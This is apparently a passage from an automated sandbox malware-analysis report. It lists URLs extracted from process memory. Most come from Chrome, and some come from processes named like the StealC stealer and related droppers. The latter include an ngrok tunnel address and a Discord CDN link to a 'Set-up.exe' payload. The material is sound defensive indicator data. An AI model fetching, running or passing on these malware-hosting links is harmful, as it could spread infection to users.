                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/LogoutB
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSessionRL
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                          Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                          Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                          Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                          Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                          Source: chrome.exe, 0000002B.00000002.2768656437.00002B3C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                          Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/px
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001396000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1286706039475015741/1300800513197211749/Set-up.exe?ex=6722286
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/k
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761492694.00002B3C00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                          Source: chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                          Source: chrome.exe, 0000002B.00000002.2762405730.00002B3C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768656437.00002B3C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                          Source: chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreez84gdRw=
                          Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn
                          Source: chrome.exe, 0000002B.00000003.2260377369.00002298006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                          Source: chrome.exe, 0000002B.00000003.2260377369.00002298006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                          Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                          Source: chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_B
                          Source: chrome.exe, 0000002B.00000003.2240743054.000037A8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2240774677.000037A8002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: chrome.exe, 0000002B.00000002.2704121158.00002B3C000AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/c
                          Source: chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                          Source: chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx&
                          Source: chrome.exe, 0000002B.00000002.2704121158.00002B3C000AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/cx
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                          Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloW
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic&quot;HELP_BASE_URL&quot;:&quot;https:
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                          Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
